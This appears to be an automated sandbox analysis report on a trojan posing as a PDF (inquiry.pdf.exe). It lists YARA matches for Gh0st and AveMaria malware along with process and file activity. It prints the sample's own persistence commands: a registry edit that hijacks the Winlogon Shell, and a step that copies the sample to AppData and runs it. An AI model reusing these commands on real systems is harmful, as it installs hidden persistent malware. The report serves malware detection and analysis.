Source: 00000014.00000003.485883886.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 00000014.00000003.485883886.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 00000014.00000003.485580240.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 00000012.00000002.534025112.0000000003C58000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 00000012.00000002.534025112.0000000003C58000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 00000014.00000003.486255631.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 00000014.00000003.486195668.0000000000E98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 00000014.00000003.485919583.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 00000014.00000003.486150119.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 00000013.00000000.403984932.0000000000919000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 00000000.00000002.329246325.0000000003C4E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 00000000.00000002.329246325.0000000003C4E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 00000000.00000002.328710772.0000000003B49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 00000000.00000002.328710772.0000000003B49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 00000012.00000002.534887876.0000000003D5D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 00000012.00000002.534887876.0000000003D5D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: C:\Users\user\Desktop\inquiry.pdf.exe Code function: 0_2_00E38218 0_2_00E38218
Source: C:\Users\user\Desktop\inquiry.pdf.exe Code function: 0_2_00E34518 0_2_00E34518
Source: C:\Users\user\Desktop\inquiry.pdf.exe Code function: 0_2_00E38840 0_2_00E38840
Source: C:\Users\user\Desktop\inquiry.pdf.exe Code function: 0_2_00E36B00 0_2_00E36B00
Source: C:\Users\user\Desktop\inquiry.pdf.exe Code function: 0_2_00E3BD40 0_2_00E3BD40
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe Code function: 18_2_01248218 18_2_01248218
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe Code function: 18_2_01244518 18_2_01244518
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe Code function: 18_2_01248840 18_2_01248840
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe Code function: 18_2_01246B00 18_2_01246B00
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe Code function: 18_2_0124F618 18_2_0124F618
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe Code function: 18_2_0298A240 18_2_0298A240
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe Code function: 18_2_02984048 18_2_02984048
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe Code function: 18_2_02984700 18_2_02984700
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe Code function: 18_2_02988B61 18_2_02988B61
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe Code function: 18_2_029828E0 18_2_029828E0
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe Code function: 18_2_029849D1 18_2_029849D1
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe Code function: 18_2_02987E20 18_2_02987E20
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe Code function: 18_2_02988019 18_2_02988019
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe Code function: 18_2_02980039 18_2_02980039
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe Code function: 18_2_02984039 18_2_02984039
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe Code function: 18_2_02980040 18_2_02980040
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe Code function: 18_2_029846F0 18_2_029846F0
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe Code function: 18_2_02986799 18_2_02986799
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe Code function: 18_2_029867A0 18_2_029867A0
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe Code function: 18_2_029885D8 18_2_029885D8
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe Code function: 18_2_029885C8 18_2_029885C8
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe Code function: 18_2_02988B90 18_2_02988B90
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe Code function: 18_2_02982B80 18_2_02982B80
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe Code function: 18_2_02982B70 18_2_02982B70
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe Code function: 18_2_029828CF 18_2_029828CF
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe Code function: 18_2_02983210 18_2_02983210
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe Code function: 18_2_02983200 18_2_02983200
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe Code function: 18_2_02983878 18_2_02983878
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe Code function: 18_2_02983868 18_2_02983868
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe Code function: 18_2_02987E10 18_2_02987E10
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe Code function: 18_2_02987DD1 18_2_02987DD1
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe Code function: 18_2_05112C90 18_2_05112C90
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe Code function: 18_2_051105F0 18_2_051105F0
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe Code function: 18_2_05110040 18_2_05110040
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe Code function: 18_2_02989CA8 CreateProcessAsUserW, 18_2_02989CA8
Source: inquiry.pdf.exe, 00000000.00000000.244002427.0000000000B3A000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamewagl.exeD vs inquiry.pdf.exe
Source: inquiry.pdf.exe, 00000000.00000002.327749606.0000000002F43000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameAstronot plart.exe> vs inquiry.pdf.exe
Source: inquiry.pdf.exe, 00000000.00000002.313574266.0000000000E5A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs inquiry.pdf.exe
Source: inquiry.pdf.exe, 00000000.00000002.328318734.0000000003A75000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamevfdgghyyyzd.dll8 vs inquiry.pdf.exe
Source: inquiry.pdf.exe, 00000000.00000002.328710772.0000000003B49000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameAstronot plart.exe> vs inquiry.pdf.exe
Source: inquiry.pdf.exe, 00000000.00000002.329246325.0000000003C4E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameAstronot plart.exe> vs inquiry.pdf.exe
Source: inquiry.pdf.exe, 00000000.00000002.330587369.0000000006070000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenamevfdgghyyyzd.dll8 vs inquiry.pdf.exe
Source: inquiry.pdf.exe, 00000000.00000002.319901193.0000000002B4E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameAstronot plart.exe> vs inquiry.pdf.exe
Source: inquiry.pdf.exe Binary or memory string: OriginalFilenamewagl.exeD vs inquiry.pdf.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\user\AppData\Roaming\glonkjhg.exe,"
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe 2D0DC6216F613AC7551A7E70A798C22AEE8EB9819428B1357E2B8C73BEF905AD
Source: inquiry.pdf.exe ReversingLabs: Detection: 39%
Source: inquiry.pdf.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\inquiry.pdf.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\inquiry.pdf.exe C:\Users\user\Desktop\inquiry.pdf.exe
Source: C:\Users\user\Desktop\inquiry.pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd" /c ping 127.0.0.1 -n 7 > nul && REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\user\AppData\Roaming\glonkjhg.exe,
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 7
Source: C:\Users\user\Desktop\inquiry.pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd" /c ping 127.0.0.1 -n 12 > nul && copy "C:\Users\user\Desktop\inquiry.pdf.exe" "C:\Users\user\AppData\Roaming\glonkjhg.exe" && ping 127.0.0.1 -n 12 > nul && "C:\Users\user\AppData\Roaming\glonkjhg.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 12
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\user\AppData\Roaming\glonkjhg.exe,"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 12
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Roaming\glonkjhg.exe C:\Users\user\AppData\Roaming\glonkjhg.exe
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe Process created: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe "C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe"
Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe Process created: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe "C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe"
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe Process created: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe "C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe"
Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe Process created: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe "C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe"
Source: C:\Users\user\Desktop\inquiry.pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd" /c ping 127.0.0.1 -n 7 > nul && REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\user\AppData\Roaming\glonkjhg.exe,
Source: C:\Users\user\Desktop\inquiry.pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd" /c ping 127.0.0.1 -n 12 > nul && copy "C:\Users\user\Desktop\inquiry.pdf.exe" "C:\Users\user\AppData\Roaming\glonkjhg.exe" && ping 127.0.0.1 -n 12 > nul && "C:\Users\user\AppData\Roaming\glonkjhg.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 7
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\user\AppData\Roaming\glonkjhg.exe,"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 12
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 12
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Roaming\glonkjhg.exe C:\Users\user\AppData\Roaming\glonkjhg.exe
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe Process created: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe "C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe"
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe Process created: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe "C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe"
Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe Process created: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe "C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe"
Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe Process created: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe "C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe"
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F324E4F9-8496-40b2-A1FF-9617C1C9AFFE}\InProcServer32
Source: C:\Users\user\Desktop\inquiry.pdf.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\inquiry.pdf.exe.log
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe File created: C:\Users\user\AppData\Local\Temp\jhFFFffkl.txt
Source: classification engine Classification label: mal100.phis.troj.expl.evad.winEXE@29/9@7/3
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe File read: C:\Users\user\Desktop\desktop.ini
Source: inquiry.pdf.exe, 00000000.00000000.243992051.0000000000B2D000.00000020.00000001.01000000.00000003.sdmp, glonkjhg.exe.13.dr Binary or memory string: Select * FROM BillingTable WHERE Billing_ID LIKE @search OR Guest_ID LIKE @search OR Booking_ID LIKE @search OR Payment_Status LIKE @search;
Source: inquiry.pdf.exe, 00000000.00000000.243992051.0000000000B2D000.00000020.00000001.01000000.00000003.sdmp, glonkjhg.exe.13.dr Binary or memory string: UPDATE RoomTable SET Room_Status = @booked WHERE Room_Number LIKE @room;
Source: inquiry.pdf.exe, 00000000.00000000.243992051.0000000000B2D000.00000020.00000001.01000000.00000003.sdmp, glonkjhg.exe.13.dr Binary or memory string: UPDATE RoomTable SET Room_Status = @unbooked WHERE Room_Number LIKE @room;
Source: inquiry.pdf.exe, 00000000.00000000.243992051.0000000000B2D000.00000020.00000001.01000000.00000003.sdmp, glonkjhg.exe.13.dr Binary or memory string: Select * FROM BookingTable WHERE Guest_ID LIKE @search OR Booking_ID LIKE @search OR Room_ID LIKE @search OR Status LIKE @search;
Source: inquiry.pdf.exe, 00000000.00000000.243992051.0000000000B2D000.00000020.00000001.01000000.00000003.sdmp, glonkjhg.exe.13.dr Binary or memory string: SELECT Guest_ID FROM GuestTable WHERE Guest_ID NOT IN(SELECT Guest_ID FROM BookingTable WHERE Status = 'Active');
Source: inquiry.pdf.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\inquiry.pdf.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5868:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4496:120:WilError_01
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Program Files\Microsoft DN1
Source: C:\Users\user\Desktop\inquiry.pdf.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\inquiry.pdf.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\inquiry.pdf.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: inquiry.pdf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Directory created: C:\Program Files\Microsoft DN1 Jump to behavior
Source: inquiry.pdf.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: AddInProcess32.pdb source: AddInProcess32.exe, 00000014.00000002.515139413.0000000003018000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: AddInProcess32.pdbpw source: AddInProcess32.exe, 00000014.00000002.515139413.0000000003018000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

Source: Yara match File source: 0.2.inquiry.pdf.exe.3b9a2b2.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.inquiry.pdf.exe.3c6b362.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.glonkjhg.exe.3d7a30a.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.glonkjhg.exe.3ca925a.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.glonkjhg.exe.3d7a30a.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.inquiry.pdf.exe.3b7d642.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.inquiry.pdf.exe.3c4e6f2.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.inquiry.pdf.exe.3b9a2b2.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.glonkjhg.exe.3c8c5ea.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.glonkjhg.exe.3d5d69a.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.glonkjhg.exe.3ca925a.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.inquiry.pdf.exe.3c6b362.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000012.00000002.520061729.0000000002B9D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.327749606.0000000002F43000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.534025112.0000000003C58000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.316384133.0000000002A8D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.329246325.0000000003C4E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.328710772.0000000003B49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.319901193.0000000002B4E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.534887876.0000000003D5D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
